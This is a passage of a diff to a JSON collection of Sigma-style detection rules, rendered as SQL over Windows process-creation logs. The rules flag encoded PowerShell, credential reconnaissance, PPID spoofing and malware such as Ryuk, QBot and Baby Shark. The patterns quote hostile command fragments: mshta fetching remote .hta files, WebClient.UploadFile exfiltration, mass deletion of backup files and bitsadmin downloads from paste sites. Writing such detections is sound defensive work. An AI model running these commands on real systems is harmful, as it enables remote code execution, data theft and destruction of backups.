'%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", - "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Administrative script libraries" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.persistence", - "attack.privilege_escalation" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "status": "experimental", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", + "status": "test", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "author": "Florian Roth (Nextron Systems)", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "status": "experimental", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", - "tags": [ + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", - "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Legitimate use of Msra.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" - }, - { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "status": "test", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": 